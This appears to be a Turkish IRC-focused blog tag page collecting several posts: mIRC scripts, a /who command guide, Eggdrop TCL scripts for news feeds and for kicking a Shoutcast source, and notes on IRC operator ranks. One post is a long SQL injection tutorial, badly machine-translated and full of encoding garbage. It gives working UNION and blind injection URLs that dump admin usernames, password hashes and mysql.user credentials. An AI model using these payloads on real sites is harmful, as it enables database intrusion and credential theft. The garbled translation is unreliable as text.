Posts Tagged “chat”
alias optes {
if (%opvote == off) { dialog -m opvotes opvotes 180 200 280 180 | dialog -t opvotes Op-Voice Teşekkür Modu Kapalı. | did -b opvotes 9 | did -b opvotes 10 | did -b opvotes 11 | did -b opvotes 12 }
if (%opvote == on) { dialog -m opvotes opvotes 180 200 280 180 | dialog -t opvotes Op-Voice Teşekkür Modu Açık. }
}
dialog opvotes {
size 180 200 296 186
box “”, 505, 1 -5 293 190
title “.::[ Op-Voice Teşekkür ]::.”
button “Kaydet ve Çık”,1,20 150 125 25,ok
button “Vazgeç”,2,155 150 125 25,cancel
text “Op (+o) Mesajı ->”,3,20 47 100 20
text “DeOp (-o) Mesajı ->”,4,20 72 100 20
text “Voice (+v) Mesajı ->”,5,20 97 100 20
text “Devoice (-v) Mesajı ->”,6,20 119 110 20
box “”,7,13 135 274 10
box “”,8,15 1 265 43,
edit %optemsg ,9,125 45 155 20,autohs
edit %deoptemsg ,10,125 69 155 20,autohs
edit %votemsg ,11,125 93 155 20,autohs
edit %devotemsg ,12,125 117 155 20,autohs
radio “Açık”,13,125 13 50 25,group
radio “Kapalı”,14,190 13 50 25
text “Durum:” 501, 70 18 35 15
}
on *:dialog:opvotes:sclick:1: { set %optemsg $did(9) | set %deoptemsg $did(10) | set %votemsg $did(11) | set %devotemsg $did(12) }
on *:dialog:opvotes:sclick:13: { set %opvote on | dialog -t opvotes Op-Voice Teşekkür Açıldı. | did -e opvotes 9 | did -e opvotes 10 | did -e opvotes 11 | did -e opvotes 12 }
on *:dialog:opvotes:sclick:14 { set %opvote off | dialog -t opvotes Op-Voice Teşekkür Kapandı. | did -b opvotes 9 | did -b opvotes 10 | did -b opvotes 11 | did -b opvotes 12 }
on *:dialog:opvotes:init:0:{
if (%opvote == on) { did -c opvotes 13 }
if (%opvote == off) { did -c opvotes 14 }
}
on ^*:OP:#:{ if ($opnick == $me) && (%opvote == on) && ($nick != $me) { msg $chan $nick %optemsg } }
on ^*:DEOP:#:{ if ($opnick == $me) && (%opvote == on) && ($nick != $me) { msg $chan $nick %deoptemsg } }
on ^*:VOICE:#:{ if ($vnick == $me) && (%opvote == on) && ($nick != $me) { msg $chan $nick %votemsg } }
on ^*:DEVOICE:#:{ if ($vnick == $me) && (%opvote == on) && ($nick != $me) { msg $chan $nick %devotemsg } }
menu menubar,status,channel {
Op voice Tesekkur :/dialog -m opvotes opvotes
}
Bu kodu Alt + R Remoteler bölümüne yazıp mircinize ekleyebilirsiniz
 Yorum Yok »
Stylex tarafýndan mIRC Aliasları içinde postalandý, tags: chat, F1 kısayol ekleme, F1 zline ekleme, kısayol zline ekleme, mirc, mirc addonları, mIRC Aliasları, mirc bul, mırç dowload, mircbul, Türkçe mirc indir
/alias /f1 /gzline $$1 2d Liderchat.Net Ircd Sunucusunda �kurallara aykırı davranışınızdan dolayı uzaklaştırıldınız...
Bu alias ı scirptinizde herhangi acık bir pencereye kopyala yapıştır yapmanız yeterli olacaktır../gzline yazan yeri siz /zline /gline /kline vs gibi seceneklerle değiştirebilirsiniz
Ayrıca /f1 kısayol tuşu değilde orayı /f2 /f3 .. vs de yapabilirsiniz..ayrıca son kısımdaki sebeb kısımıda kendinize göre ayarlayabilirsiniz...
Yorum Yok »
Bu kod u script remotenize eklemeniz yeterli olacaktır..Böylece sunucuya bağlandığınızda otomatik memo listenizi görebilirsiniz…
on *:CONNECT: {
.ns ghost nickiniz nickşifreniz
.nick kullandiginiznick
.msg nickserv identify nickşifreniz
.ms list
}
Yorum Yok »
admin tarafýndan Hazır Kodlar, IRCd Dökümanları, IRCd Komutları içinde postalandý, tags: Addonlar, çet, chat, kodlar, mIRC Aliasları, mirc komutları, mirc sohbet, remoteler, who, whois
/who komutu ve kullanımı
Önbilgi : bu komut bir sunucudaki kullanıcıları, bu kullanıcıların durumları ve masklarını listelemek için kullanılır. kullanıcılara sunucu tarafından +i modu verildiğinden dolayı bir kanaldaki kullanıcıları listelemek için o kanalda bulunmanız gerekmektedir.
/Who komutu beraberinde kullanılan parametreler ile aradığımız sonuca en kısa yoldan ulaşmamızı sağlar.
bu parametreleri ve kullanım şekillerini kapsamlı bir şekilde işleyeceğiz
Who komutu ile birlikte kullanılan parametreler ;
n : belirttiğimiz maskı içeren nickleri listeler
c : belirttiğimiz kanaldaki kullanıcıları listeler
u : belirttiğimiz maskı içeren idente sahip kullanıcıları listeler
h : belirttiğimiz maskı içeren hosta sahip kullanıcıları listeler
a : away durumuna göre inceler
m : usermode
Who komutundaki durum kipleri ;
r : Kullanıcı kayıtlı bir nick kullanmaktadır.
* : Kullanicı IRC Operatorüdür.
@ : Kullanıcı kanalda +o(OP) durumundadır.
+ : Kullanıcı kanalda +v(VOICE) durumundadır.
H : Kullanicı online durumdadır(away değildir).
G : Kullanicı away durumdadır.
Who komutları ile ilk kez tanışıyorsanız ilk bakışta zor görünebilir örnekleri incelediğimizde zor olmadığını anlayacaksınız
Who komutu çözümlü soruları ;
soru: #kanal kanalında bulunan, identleri a harfi ile başlayan kullanıcıları listelemek istiyorum, nasıl yapabilirim ?
çözüm: /who +cu #kanal a*
soru: #kanal kanalında bulunan, identleri a harfi ile biten kullanıcıları listelemek istiyorum, nasıl yapabilirim ?
çözüm: /who +cu #kanal *a
soru: #kanal kanalında hostlarında “helper” geçen kullanıcıları listelemek istiyorum, nasıl yapabilirim ?
çözüm: /who +ch #kanal *helper*
soru: #kanal kanalında away durumunda olan kullanıcıları lisletemek istiyorum, nasıl yapabilirim ?
çözüm: /who +ca #kanal
soru: #kanal kanalında, içersinde x harfi bulunmayan nickleri listelemek istiyorum, nasıl yapabilirim ?
çözüm: /who +c-n #kanal *x*
soru: #kanal kanalındaki nicki dört haneli kullanıcıları listelemek istiyorum, nasıl yapabilirim ?
çözüm: /who +cn #kanal ????
soru: #kanal kanalında ki Network Adminleri listelemek istiyorum, nasıl yapabilirim ?
çözüm: /who +cm #kanal N
soru: #kanal kanalında ki away olmayan kullanıcıları listelemek istiyorum, nasıl yapabilirim ?
çözüm: /who +c-a #kanal
soru: #x1 kanalında aşağıdaki özellikleri listelemek istiyorum
a) away olmayanları
b) identi LiderChat olanları
c) hostunda “Merkez” sözcüğü geçenleri
d) Local operatör olmayanları
tek komutta listelemek istiyorum, nasıl yapabilirim ?
çözüm:
a) /who +ca #x1
b) /who +cu #x1 LiderChat
c) /who +ch #x1 *Merkez*
d) /who +c-m #x1 O
çözümü tek komutta toplamak istersek ;
/who +cuh-ma #x1 LiderChat *Merkez* O
çözümlü örnek:
“/Who Razor ” yazdığımda ;
#Dj Razor Hr Im@d :0 saçma
Razor End of /WHO list.
Yanıtını alırken,
“Who Soul” yazdığımda ;
#System Soul Hr*~ Siyah@Soul :0 Siyah Ruh.. :1 LiderChat.net
yanıtını alıyorum. şimdi bunların ne anlama geldiğini iceleyelim
Razor nicki “Razor on @#kanal @#operhelp @#admin #yardim”
kanallarında olmasına karşılık biz sadece #Dj kanalında olduğunu
görüyoruz neden ?
“/who nick” komutu ile yapılan aramalarda kullanıcının son girdiği kanalı görürüz.
H: Burada “H” kullanıcı online durumdadır bilgisini verir.
r: Kullanıcının kayıtlı bir nick’e sahip olduğu anlamına gelir.
peki Razor’dan gelen yanıta bakıldığında “:0 saçma” özelliklerine sahip olduğunu görüyoruz ancak Soul’dan gelen cevapta “:1 LiderChat.net” özelliklerini görüyoruz buradaki “:1 , :0″ rakamları neyi ifade eder ?
“0″ kullanıcının ana link üzerinden bağlandığını gösterir.Ancak kendine “/who nick” komutunu uygulayan herkes “0″ cevabını alır.
“1″ kullanıcının 1 numaralı link üzerinden servera bağlı olduğu anlamına gelir.
bu sıralamayı /links komutunu uyguladığımızda da görmemiz mümkün.
Yorum Yok »
#
# Haber_Okuyucu.tcl v1.5
# Bu tcl güncel haberleri haberokur.com sitesinden okuyarak kanalınıza yazdırmak için geliştirilmiştir.
# Kullanımı kanal genelinde !haber şeklindedir. ilk Komutta haberler kanala yansıtılmaya başlar
# Tekrar aynı komut verildiğinde o an okunan haberlerin bitiminde bot durur.
# Http.tcl ile birlikte kullanılmalıdır.
# Tcl’lericonfunuza ;
#
# source scripts/haber_okuyucu.tcl
# source scripts/http.tcl
#
# şeklinde ekleyebilirsiniz
#
# Yapımcı : BuCaLI
# e-mail : xbucalix@hotmail.com
#
# Haberlerin okunacağı kanal
set kanal “#haber”
# Haberlerin Kanala Yansıyacağı Zaman Aralığı (Dakika Cinsinden)
set zaman 10
bind pub – !haber basla
channel add $kanal
proc basla { n u h c a } {
global basladi zaman kanal okut
if {![isop $n $c]} { putserv “privmsg $c Kanal Operatörü Olmadığınız İçin Bu Komudu Kullanamazsınız $n ..!” ; return 0 }
if {[info exists basladi]} {
putserv “privmsg $c \00307Haberler Durduruldu..!”
killtimer $okut
unset basladi
} else {
putserv “privmsg $c \00307Haberler Başlatılıyor..! $zaman Dakika Arayla Haberler $kanal Kanalına Yansıtılacak…”
set basladi 1
oku
}
}
proc oku { } {
global kanal zaman okut
set okut [timer $zaman [list oku]]
set baglan [::http::geturl http://www.haberokur.com/rss.php?kat=1000]
set veriler [::http::data $baglan]
set list [split [subst -nocommands $veriler] “\n”]
foreach i $list {
regexp — {} $i – baslik
regexp — {
(.+?)
} $i – aciklama
regexp — {Devamı İçin Tıklayınız…} $i – link
if {[info exists baslik]} {
regsub -all “'” $baslik “‘” baslik
regsub -all “"” $baslik “\”" baslik
regsub -all “ ” $baslik ” ” baslik
putserv “privmsg $kanal \00304 ::::: $baslik :::::\003″
unset baslik
}
if {[info exists aciklama]} {
regsub -all “'” $aciklama “‘” aciklama
regsub -all “"” $aciklama “\”" aciklama
regsub -all “ ” $aciklama ” ” aciklama
putserv “privmsg $kanal \00301 $aciklama \003″
unset aciklama
}
if {[info exists link]} {
putserv “privmsg $kanal \00301Devamı İçin Tıklayınız »\00312 $link \003″
unset link
}
}
::http::cleanup $veriler
}
Oku: Botta yapılan yeni güncellemeyle bot sadece kanal oplarının kullanımı ile kısıtlanmış ve tcl’de belirttiğiniz kanalda !haber komutu ile yine tcl’de belirttiğiniz zaman aralığında başlayarak haberleri kanala yansıtmaktadır. Durdurmak için aynı kanal genelinde tekrar !haber komutunu yazmalısınız. Yanlız durması için o anki haberleri yazmayı bitirmesini bekleyingereklidir.Butun Eggdrop Tcl Yükleme İşlemlerinde Uygulamalar Geçerlidir.
Yorum Yok »
YayinKick.tcl Kullanimi Ve Amaçlari:
Ssh,putty Kullanimina gerek Kalmadan Takili Kalan Yayini Veya, Radio hacklenmesinde Uygunsuz Yayinlara Aninda Mudahale Edebileceginiz güzel bir tcl:
Kurulumu:
Kodlayan Düzenleyen: KeMaNcI
Öncelikle radionuzun kurulu oldugu sc_serv.conf dosyamizi açip küçük nir edit yapiyoruz..
;AdminPassword=
satirinina admin şifrenizi belirtip kapatip tekrar açin.. ( Başinda ; işareti varsa kaldirin ) daha sonra aşagidaki bilgileri kendi radyonuz göre düzenleyerek tcl yi ekleyip tanidin:
##Buraya Radyonun İp Adresini Yazin..
set ip “ipadres”
##Buraya Radyonun Portunu Yazin..
set port “port”
##Buraya Radyonun Şifresini Yazin..
set pass “password”
##Buraya Radyonun Admin Şifresini Yazin..
set adminpass “adminpass”
## Buraya Komutun Geçerli Olacaği Kanali Yazin..
set kickkanal “#Dj”
## Başkada Birşeye Dokunmuyoruz. Gerisini Ben Hallederim
bind pub – !kickradyo kickradyo
proc kickradyo {nick host handle chan arg} {
global ip port pass adminpass kickkanal
if {$chan != $kickkanal} {return 0}
set sock [socket [duzelt $ip] [duzelt $port]]
puts $sock “GET /admin.cgi?pass=[duzelt $pass]&mode=kicksrc&pass=[duzelt $adminpass] HTTP/1.0″
puts $sock “User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.9)”
puts $sock “Host: $ip”
puts $sock “Connection: close”
puts $sock “”
flush $sock
close $sock
putserv “PRIVMSG #Dj :�12Radyo Yayini Düşürülmüştür.. Lütfen Yayini Aliniz..�”
}
proc duzelt { a } {
regsub -all {\}} $a “” a
regsub -all {\{} $a “” a
regsub -all {\;} $a “” a
regsub -all {\*} $a “” a
regsub -all ” ” $a “” a
return $a
}
######kickradyo.tcl#########
## Coded By KeMaNcI #
############################
Yorum Yok »
admin tarafýndan Web içinde postalandý, tags: chat, chat yap, mirc, mirc indir, mirc odalari, mircbul.net, Mysql anlatım, sohbet odaları, Sql, web tasarımı
SQL ve mysql **baya geniş anlatım…
Bu eğitimde i SQL enjeksiyon işleri anlatacağız ve nasıl
bazı yararlı bilgiler almak için kullanın.
Öncelikle: SQL enjeksiyonu nedir?
Ita ¢ â, ¬ â “¢ bugün bir web uygulamalarında en yaygın güvenlik açığı var.
Bu saldırgan, URL ve kazanç erişim veritabanı sorgusu çalıştırmaya olanak sağlar
bazı gizli bilgiler etcà ¢ â, ¬ A | kısa bir süre (olarak).
1.SQL Enjeksiyon (klasik veya hata tabanlı veya her ne arama)
2.Blind SQL Injection (sert parçası)
So Leta ¢ â, ¬ â “¢ bazı eylem ile başlayalım
1). Kontrol güvenlik açığı için
Leta ¢ â, ¬ â “¢ s bu gibi bazı site söylüyor
http://www.site.com/news.php?id=5
Şu anda test etmek için biz url à ¢ â, ¬ É (tırnak) sonuna eklemek, vulrnable eğer bir
ve olurdu http://www.site.com/news.php?id=5Ã ¢ â, ¬ Â ²
bu nedenle bazı hata gibi olsun
à ¢ â, ¬ â “Kendi SQL sözdizimi bir hata var; bu doğru etcà ¢ â, ¬  MySQL sunucu sürümü ile uyumlu kılavuzu | à ¢ â, ¬  kontrol?
veya benzeri
demek sql enjeksiyon için vulrnable olduğunu
2). Sütun sayısını bul
Biz ORDER BY deyimi kullanmak sütun sayısını bulmak için () veritabanı nasıl sonuç sipariş söyler
öylesine nasıl kullanılır? Kadar biz bir hata Şey sadece sayısı artan.
http://www.site.com/news.php?id=5 1 tarafindan / * <à ¢ â, ¬ â € œ hata
http://www.site.com/news.php?id=5 2 tarafindan / * <à ¢ â, ¬ â € œ hata
http://www.site.com/news.php?id=5 3 tarafindan / * <à ¢ â, ¬ â € œ hata
http://www.site.com/news.php?id=5 4 tarafindan / * <à ¢ â, ¬ â € œ hata (biz à ¢ â, ¬ Ëœorder clauseà ¢ â, ¬ â "¢ veya bu Unknown column à ¢ â, ¬ Ëœ4à ¢ â, ¬  ² gibi mesaj olsun something like that)
bu o 3 sütun vardır, biz 4 bir hata var neden anlamına gelir.
3). Kontrol BİRLİĞİ fonksiyon için
Ile sendika biz bir SQL deyiminde daha fazla veri seçebilirsiniz.
so we have
http://www.site.com/news.php?id=5 UNION ALL SELECT 1,2,3 / * (zaten sütun bu sayıda bulunan 3 bölüm 2) vardır. )
eğer ekranda bazı sayılar, yani 1 veya 2 veya 3 sonra BİRLİĞİ görmek çalışır
4). Kontrol MySQL için sürüm
http://www.site.com/news.php?id=5 UNION ALL SELECT 1,2,3 / * NOT: / * çalışmıyorsa veya sonra à ¢ â, ¬ â € œ deneyin bazı hatalar elde
ita ¢ â, ¬ â "¢ sa yorum ve ita ¢ â, ¬ â" ¢ bizim sorgu için düzgün çalışması için önemli var.
ki, şimdi sürümünü kontrol etmek için ekranda numarası 2 düşünelim
biz () ve 4.1.33 gibi Someting olsun-günlük veya 5.0.45 sürümü veya benzer veya sürüm @ ile 2 numaralı değiştirin.
bu gibi görünmelidir http://www.site.com/news.php?id=5 sürüm 3 @ UNION ALL SELECT 1, / *
Eğer, ¬ Å "union + collations yasadışı karışımı bir hata à ¢ â olsun (örtük + mecburi) à ¢ â, ¬  | à ¢ â, ¬ Â?
i didnà ¢ â, ¬ â "¢ t herhangi bir kağıt Bu sorunu kapsayan görmek, bu yüzden yazmalısınız
biz () fonksiyonu dönüştürmek ne gerek
İ.E.
http://www.site.com/news.php?id=5 UNION ALL SELECT 1, (@ version @ latin1 kullanarak), 3 convert / *
veya hex ile () ve unhex ()
İ.E.
http://www.site.com/news.php?id=5 UNION ALL SELECT 1, 3 (hex (sürüm @)), @ unhex / *
ve MySQL version alacaksınız
5). Tablo ve sütun adını Başlarken
iyi eğer MySQL sürümü <5 (yani 4.1.33, 4.1.12Ã ¢ â, ¬ Â |) <Ã ¢ â, ¬ â €? sonra ben MySQL için açıklayacağız> 5 sürümü.
Biz çoğu isim tablo ve sütun tahmin etmek gerekir.
genel tablo adları şunlardır: kullanıcı / s, admin / member s / Ã ¢ â, ¬ Â s |
ortak sütun isimleri şunlardır: kullanıcı adı, kullanıcı, usr, kullanıcı_adı, parola, passwd, pass, pwd etcà ¢ â, ¬  |
i.e olurdu
http://www.site.com/news.php?id=5 admin den UNION ALL SELECT 1,2,3 / * (daha önce ve thata ¢ â, ¬ â “¢ gibi ekranda 2 numaralı görmek güzel: D)
Biz bu tablo biliyoruz yönetici existsà ¢ â, ¬  |
şimdi sütun isimleri ekleyin.
http://www.site.com/news.php?id=5 Birliği 1, kullanıcı adı, 3 yönetici den / * (eğer bir hata seçin sonra) diğer sütun isim deneyin
biz olsun kullanıcı adı ekranda, örneğin yönetici veya olacağı gösterilmiştir superadmin etcà ¢ â, ¬  |
şimdi eğer sütun şifrenizi kontrol edin için vardır
http://www.site.com/news.php?id=5 Birliği 1, parola, 3 yönetici den / * (eğer bir hata seçin sonra) diğer sütun isim deneyin
biz karma veya düz metin ekranda, nasıl veritabanı kurmak olduğu bağlıdır şifre görüldü
i.e MD5 hash, mysql, karma, sha1Ã ¢ â, ¬ Â |
şimdi sorgu güzel bakmak tamamlamalısınız
biz concat () fonksiyonunu kullanabilirsiniz için (o) dizeleri katıldı
i.e
http://www.site.com/news.php?id=5 UNION ALL SELECT 1, concat (0Ã⠀ “3a, password), 3 yönetici adresinden kullanıcı adı / *
Bu i “3a 0Ã⠀ koymak Not yönelik hex değeri: (böylece 0Ã⠀” 3a kolon için hex değer)
(bunun için başka bir yoludur, char (5, ascii değeri için
http://www.site.com/news.php?id=5 UNION ALL SELECT 1, concat (char (5, password), 3 yönetici adresinden kullanıcı adı / *
şimdi kullanıcı adı dislayed olsun: ekranda şifre, yani admin: admin veya admin: somehash
Bunu varsa, yönetici ya da ayrıcalıklı gibi giriş yapabilirsiniz
Eğer cana ¢ â, ¬ â “¢ t doğru tablo adı sanırım, her zaman mysql.user (varsayılan) deneyebilirsiniz
o, bu nedenle örnek olacak kullanıcı i şifre sütunlu
http://www.site.com/news.php?id=5 UNION ALL SELECT 1, concat (user, 0Ã⠀ “3a, password), 3 mysql.user den / *
6). MySQL 5
I gibi ià ¢ â, ¬ â “¢ önce m isimleri nasıl tablo ve sütun için açıklamak olacak dedi
MySQL> 5.
Bu biz information_schema ihtiyacı için. Tüm tablo ve sütunları veritabanında tutar.
Kullandığımız tablo almak tablo_ismi ve INFORMATION_SCHEMA.TABLES.
i.e
http://www.site.com/news.php?id=5 Birliği 1, tablo_ismi, 3 INFORMATION_SCHEMA.TABLES seçin / *
burada tablo_ismi INFORMATION_SCHEMA.TABLES gelen ilk tablo kurtulabilmek için bizim 2 numaralı yerini
ekranda görüntülenir. Şimdi sorgunun sonuna kadar tüm masaları dışarı listesine SINIR eklemeniz gerekir.
i.e
http://www.site.com/news.php?id=5 Birliği 1, tablo_ismi, 3 INFORMATION_SCHEMA.TABLES seçin limiti 0,1 / *
unutmayın ben 0,1 koymak () 1 sonuç 0 başlangıç olsun
Şimdi ikinci tablo görüntülemek için, biz 1,1 sınırlamak sınırı 0,1 değiştirmek
i.e
http://www.site.com/news.php?id=5 Birliği 1, tablo_ismi, 3 INFORMATION_SCHEMA.TABLES seçin limiti 1,1 / *
İkinci tabloda görüntülenir.
biz sınır koymak üçüncü tablo için 2,1
i.e
http://www.site.com/news.php?id=5 Birliği 1, tablo_ismi, 3 INFORMATION_SCHEMA.TABLES seçin limiti 2,1 / *
kadar bazı db_admin, poll_user, auth gibi yararlı olsun artan tutmak, auth_user etcà ¢ â, ¬  |
Yöntem aynı sütun isimleri almak için.
Burada kullandığımız sütun_ismi ve information_schema.columns
yöntem çok Yukarıdaki örnek olacağını aynıdır
http://www.site.com/news.php?id=5 Birliği 1, sütun_ismi, 3 information_schema.columns seçin limiti 0,1 / *
ilk sütun diplayed olduğunu.
ikincisi (biz) 1,1 sınırlamak için sınırı 0,1 değiştirmek
yani.
http://www.site.com/news.php?id=5 Birliği 1, sütun_ismi, 3 information_schema.columns seçin limiti 1,1 / *
İkinci sütun, böylece siz bir şey gibi olsun artan tutmak görüntülenir
kullanıcı adı, kullanıcı, giriş, parola, pass, etcà ¢ â, ¬  passwd |
Eğer bu sorgu kullanmak özel tablo için sütun adlarını göstermek istiyorum. (burada fıkra)
Leta ¢ â, ¬ â “¢ s ki tablo kullanıcıları bulunduğunu açıkladı.
i.e
http://www.site.com/news.php?id=5 Birliği 1, sütun_ismi, 3 information_schema.columns nereden tablo_ismi = à ¢ â, ¬ â “¢ usersà ¢ â, ¬ â” ¢ / * seçin
şimdi tablo kullanıcıları sütun adı görüntülenir olsun. Sadece LIMIT kullanarak biz tablo kullanıcıları bütün sütunların listeleyebilirsiniz.
Bu wonà ¢ â, ¬ â “¢ t çalışır sihirli tırnak AÇIK unutmayın.
Leta ¢ â, ¬ â “¢ s biz colums kullanıcı, geçiş ve e-posta bulunduğu bildirildi.
Şimdi sorgu hep birlikte onları koymak için tamamlamak için
ki concat kullanım için (), i daha önceden açıklamak.
i.e
http://www.site.com/news.php?id=5 UNION ALL SELECT 1, concat (user, 0Ã⠀ “3a, 0Ã⠀”, e-posta) kullanıcılarının 3a pass / *
biz burada ne olsun kullanıcı: şifre: e-posta tablo kullanıcılardan.
Örneğin: admin: hash: whatever@blabla.com
Thata ¢ â, ¬ â “¢ Bu bölümdeki tüm ler, şimdi daha zor bölümünde devam edebilirsiniz
2. Blind SQL Injection
Kör enjeksiyon biraz klasik enjeksiyon daha karmaşık ama yapılabilir
Ben belirtmek zorundadır, orada xprog tarafından çok iyi kör SQL Injection Tutorial, böylece ita ¢ â, ¬ â “¢ kötü okumak için değil s
Leta ¢ â, ¬ â “¢ gelişmiş malzeme ile başlayalım.
Ben örnekle olacak
http://www.site.com/news.php?id=5
Biz bu idam, biz, bazı sayfa ve o sayfadaki makalelere bakın etcà ¢ â, ¬  resimleri |
o zaman kör SQL Injection saldırısı için test etmek istiyorum
http://www.site.com/news.php?id=5 ve 1 = 1 <Ã ¢ â, ¬ â €? Bu her zaman doğrudur
ve sayfa yük normal thata ¢ â, ¬ â "¢ s ok.
Şimdi gerçek test
http://www.site.com/news.php?id=5 ve 1 = 2 <Ã ¢ â, ¬ â €? Bu yanlış
bu nedenle bazı metin, resim veya bazı içerik iade sayfasında daha sonra bu sitede kör SQL enjeksiyon için vulrnable bir eksik.
1) MySQL sürümü alın
biz substring kullanmak kör saldırı sürümü almak için
i.e
http://www.site.com/news.php?id=5 ve substring (sürüm @, 1,1) = 4
Eğer MySQL 4 sürümünü bu TRUE dönmeliyiz.
5, ve eğer sorgu geri sonra sürüm 5 TRUE 4 değiştirin.
i.e
http://www.site.com/news.php?id=5 ve substring (sürüm @, 1,1) = 5
2) Test eğer subselect çalışır
zaman dona ¢ â, ¬ â "¢ t iş o zaman subselect kullanmak seçin
i.e
http://www.site.com/news.php?id=5 ve () = 1 1 seçin
Eğer sayfa yüklendikten sonra normal çalışma subselects.
eğer biz mysql.user erişmek için var o zaman görecek
i.e
http://www.site.com/news.php?id=5 ve () = 1 1 mysql.user limit 0,1 seçin
Eğer sayfa yük normal biz daha sonra biz () fonksiyonu ve çıkan dosya bazı şifre usign load_file indirebiliriz mysql.user erişebilir.
3). Kontrol edin tablo ve sütun isimleri
Bu bölümde zaman tahmin olduğunu en iyi arkadaşım
İ.E.
http://www.site.com/news.php?id=5 ve (sınırı 0,1 kullanıcılardan) sınırı 0,1 bizim burada sorgu = 1 (1 seçin veri 1 satır gönderir, neden subselect sadece 1 sıra döner, bu çok önemlidir.)
o zaman eğer içeriği eksik normal olmayan sayfa yük, tablo kullanıcıları çıkar.
Eğer) kadar doğru bir tahmin sadece tablo adını değiştirmek YANLIŞ (bazı makale eksik olsun
Leta ¢ â, ¬ â "¢ s ki bu tablo adını kullanıcılar, şimdi ne ihtiyacımız olduğunu bulduk demek sütun adıdır.
Aynı tablo adı olarak, tahmin başlatın. I like önce sütunlar için ortak adları deneyin dedi.
i.e
http://www.site.com/news.php?id=5 ve (substring seçin (concat (1, password), 1,1) kullanıcı limiti 0,1 den) = 1
Eğer sayfa yük normalde biz o sütun adı şifre (eğer biz olsun o zaman yanlış ortak adları veya sadece tahmin deneyin) olduğunu biliyorum
burada sütun şifre ile, sonra ilk karakteri döner substring 1 birleştirme (1,1)
(lamersitesi )
4). Veritabanından veri Çekme
bu nedenle karakterler çekme olacak biz tablo kullanıcıları i sütun username parola bulundu.
http://www.site.com/news.php?id=5 ve ascii (limit 0,1 kullanıcılardan))) 1,1 (kullanıcı adı, 0Ã⠀ "3a, password) ((SELECT concat substring> 80
Bu tablo burada kullanıcıların ilk kullanıcı ilk karakteri çeker ok.
Burada ilk karakter ve uzunluğu 1 karakter döndürür substring. ascii () dönüştürür ASCII değeri içine 1 karakter
ve sonra simbol daha sonra ile karşılaştırın>.
öylesine eğer ascii char sonra 80, sayfa yük normalde daha büyük. () DOĞRU
biz dek yanlış olsun denemeye devam.
http://www.site.com/news.php?id=5 ve ascii (limit 0,1 kullanıcılardan))) 1,1 (kullanıcı adı, 0Ã⠀ “3a, password) ((SELECT concat substring> 95
biz, DOĞRU olsun artan tutmak
http://www.site.com/news.php?id=5 ve ascii (limit 0,1 kullanıcılardan))) 1,1 (kullanıcı adı, 0Ã⠀ “3a, password) ((SELECT concat substring> 98
Yeniden, daha yüksek DOĞRU
http://www.site.com/news.php?id=5 ve ascii (limit 0,1 kullanıcılardan))) 1,1 (kullanıcı adı, 0Ã⠀ “3a, password) ((SELECT concat substring> 99
YANLIŞ!
böylece kullanıcı adı ilk karakter char (99) olduğunu. ) Biz char (99 biliyorum ascii çevirici kullanarak mektup à ¢ â, ¬ Ëœcà ¢ â, ¬ â “¢ olduğunu.
sonra Leta ¢ â, ¬ â “¢ ikinci karakteri kontrol var.
http://www.site.com/news.php?id=5 ve ascii (limit 0,1 kullanıcılardan))) 2,1 (kullanıcı adı, 0Ã⠀ “3a, password) ((SELECT concat substring> 99
Bu ià ¢ â, ¬ â “¢, 1,1, 2,1, ikinci karakteri almak için değiştirildi m unutmayın. (şimdi) ikinci karakter uzunluğunda 1 karakter döndürür
http://www.site.com/news.php?id=5 ve ascii (limit 0,1 kullanıcılardan))) 1,1 (kullanıcı adı, 0Ã⠀ “3a, password) ((SELECT concat substring> 99
TRUE sayfa yük normalde daha yüksek.
http://www.site.com/news.php?id=5 ve ascii (limit 0,1 kullanıcılardan))) 1,1 (kullanıcı adı, 0Ã⠀ “3a, password) ((SELECT concat substring> 107
YANLIŞ, düşük sayısı.
http://www.site.com/news.php?id=5 ve ascii (limit 0,1 kullanıcılardan))) 1,1 (kullanıcı adı, 0Ã⠀ “3a, password) ((SELECT concat substring> 104
Yüksek DOĞRU.
http://www.site.com/news.php?id=5 ve ascii (limit 0,1 kullanıcılardan))) 1,1 (kullanıcı adı, 0Ã⠀ “3a, password) ((SELECT concat substring> 105
YANLIŞ!
biz ikinci karakteri (105) char olduğunu biliyor ve bu à ¢ â, ¬ Ëœià ¢ â, ¬ â “¢ olduğunu. Biz à ¢ â, ¬ Ëœcià ¢ â, ¬ â “¢ şimdiye kadar var
kadar olsun sonuna kadar artan tutun. (zaman> 0 döner biz biz sonuna ulaşmak biliyorum) yanlış.
Orada Kör SQL Enjeksiyon için bazı araçlar, i think sqlmap olan en iyi, ama ià ¢ â, ¬ â “¢ m el her şeyi yapıyor,
nedeni daha iyi ENJEKTÖR SQL yapar
Yorum Yok »
admin tarafýndan IRC Makaleleri, IRCd Dökümanları, IRCd-Services içinde postalandý, tags: chat, chat odaları, İRCD makaleleri, IRCd-Services, ircop ile ilgili eğitim, IRCoplarin kac degisik ''tipi'' vardir?, mirc download, mircpro, sohbet, Türkçe mirc indir
IRCoplarin hepsi de ayni guclere sahip degillerdir.Farkli kategorileri vardir ve her birinin farkli komutlar icin erisimleri vardir.Genelde hepsinin oncelikli listelenmis olan komutlara erisim haklari vardir.Daha yuksek kategoriler de bulunanlarin sorumluluklari ve gorevleri daha fazladir.Asagidaki aciklamalar size neler yapabilecekleri konusunda genel bir fikir verecektir.
1 Local Operator
Local IRCop’un bulundugu serverden ona WHOIS cektiginizde sadece bir oper olarak gozukur.K:lineler yapma (Local server banlari), serverlerini baglama, serverinden kullanicilarin baglantilarini koparma, +i kipinde olan kullanicilari gorme ve daha baska sinirli ozellikleri kullanma yetkisine sahiptir.
Genel konusmak gerekirse, local operatorler yalnizca belli bir server uzerinde etki edebilme olanagina sahiptirler; agin geri kalan kisimlarina etki edemezler.
2 Global Operator
Bir Global IRCop, hangi server uzerinde bulunursaniz bulunun bir oper olarak gorunurler.Agdan kullanicilarin baglantilarini koparabilirler, ChanServ access listelerini gorebilirler (aop/sop/count), vb.
Local operlerin aksine, global operler yaptiklari hareketlerle tum ag uzerinde etkilidirler.
3 Servisler Yoneticisi
Servisler Yoneticisi, SA (kullanici kipi +a) olarakta bilinmektedir.Ag genelinde banlar koyabilirler, kanallari masskick(kitlesel kick) edebilirler, NickServ access listesini goruntuleyebilirler, kanalda bulunmadan veya op olmadan kanal kiplerini degistirebilirler, vb.
4 Server Yoneticisi
Server Yoneticisi (kullanici kipi +A) bir Liderchat serverinin yoneticisi konumundadir. Serverlerinin baslica operleriyle ve genelde serverlerinin iyi bir sekilde islemeleriyle sorumludurlar.Bir server, iki server yoneticisine kadar cikabilir.
5 Kanal Servisleri Operatoru
